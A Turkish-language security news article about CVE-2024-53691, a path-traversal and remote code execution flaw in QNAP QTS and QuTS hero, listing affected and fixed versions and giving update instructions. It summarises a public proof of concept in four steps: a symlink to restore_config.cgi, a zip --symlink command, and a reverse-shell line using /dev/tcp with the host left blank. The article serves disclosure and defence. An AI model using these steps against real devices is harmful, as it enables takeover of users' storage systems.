CVE-2024-53691 olarak takip edilen, QNAP’ın QTS ve QuTS Hero işletim sistemleri kullanıcılarını etkileyen kritik bir uzaktan kod yürütme (RCE) güvenlik açığı yakın zamanda gün ışığına çıktı.
Bu güvenlik açığı, kullanıcı erişim ayrıcalıklarına sahip uzak saldırganların dosya sisteminde geçiş yapmasına ve etkilenen sistemlerde rastgele kod çalıştırmasına olanak tanır.
CVSS puanı 8,7 olan bu güvenlik açığının ciddiyeti, QNAP kullanıcılarının önerilen güncellemeleri acilen uygulaması gerektiğinin altını çiziyor.
Keşif ve Etki
22 Nisan 2024’te bildirildiği üzere CVE-2024-53691, saldırganların bir güvenlik açığından sonra bir bağlantıdan yararlanmasına olanak tanıyor.
Mevcut erişim haklarını kullanarak, bir ZIP dosyası yoluyla sembolik bir bağlantı yükleyebilir ve rastgele dosya yazma yetenekleri elde etmek için sistemin şifreleme/şifre çözme işlevlerini değiştirebilirler.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Bu istismar, saldırganın ayrıcalıklarını artırabilir ve kodun kök kullanıcı olarak çalıştırılmasıyla tüm sistemin ele geçirilmesine neden olabilir.
Güvenlik açığı öncelikle QTS 5.1.x ve QuTS Hero h5.1.x sürümlerini etkiliyor. Yamalar 7 Eylül 2024’te aşağıdaki sabit sürümler aracılığıyla yayımlandı:
- QTS: 5.2.0.2802 derleme 20240620 ve sonrası
- QTS kahramanı: 5.2.0.2802 derleme 20240620 ve sonrası
Etkilenen Sürümler
- Etkilenen: QTS 5.1.x, QuTS kahraman h5.1.x
- Sabit: QTS 5.2.0.2802 derleme 20240620 ve üzeri, QuTS Hero h5.2.0.2802 derleme 20240620 ve üzeri
Kavram Kanıtı (PoC) İstismarının Yayınlanması
Keşfin ardından Github tarafından CVE-2024-53691’in istismarını gösteren bir kavram kanıtı (PoC) istismarı yayınlandı.
Bu istismar, saldırganın kabuk erişimi elde etmek için kullanabileceği yürütülebilir bir dosyaya sembolik bir bağlantı oluşturmakla başlayan birkaç önemli adımdan oluşuyor. Aşağıda sürece ilişkin bir genel bakış yer almaktadır:
- Sembolik Bağlantı Oluşturun:
Saldırgan, hassas bir dosyaya işaret eden bir sembolik bağlantı oluşturur. Örneğin:
ln -s /home/httpd/cgi-bin/restore_config.cgi link.txt
- Zipleme ve Yükleme:
Sembolik bağlantı sıkıştırılır ve web arayüzü aracılığıyla QNAP cihazına yüklenir. Saldırgan aşağıdaki komutları kullanabilir:
zip --symlink pwn.zip link.txt
- Yük Hazırlığı:
Saldırganın uzak bağlantı kurmasına olanak tanıyan, ters kabuk komut dosyası içeren bir yük dosyası oluşturulur:
#!/bin/sh
bash -c "bash -i >& /dev/tcp// 0>&1" &
- Yürütme Tetikleyicisi:
ZIP dosyası çıkartıldıktan ve veri yürütüldükten sonra saldırgan, yönetici olarak kabuk erişimi elde edebilir.
QNAP, bu güvenlik açığıyla ilişkili potansiyel riskleri azaltmak için kullanıcılara sistemlerini mümkün olan en kısa sürede sabit sürümlere güncellemelerini şiddetle tavsiye eder. Güncellemek için:
- QTS veya QuTS Hero arayüzünde yönetici olarak oturum açın.
- Denetim Masası > Sistem > Firmware Güncelleme’ye gidin.
- Mevcut güncellemeleri indirip yüklemek için Güncellemeyi Denetle’ye tıklayın.
Kullanıcılar ayrıca cihazlarını yetkisiz erişimlere karşı düzenli olarak izlemeli ve ağ güvenlik duvarları ve izinsiz giriş tespit sistemleri gibi ek güvenlik önlemlerini uygulamalıdır.
CVE-2024-53691’in açıklanması, siber güvenlik konusunda dikkatli olmanın önemini ve düzenli yazılım güncellemelerinin gerekliliğini vurgulamaktadır.
QNAP kullanıcıları, cihazlarının güvenliğini sağlamak için proaktif adımlar atarak kendilerini bu ciddi güvenlik açığından yararlanma potansiyeline karşı koruyabilirler.
Jenkins & Jira’yı Kullanarak Uygulama Güvenliğini CI/CD İş Akışlarınıza Entegre Etme -> Ücretsiz Web Semineri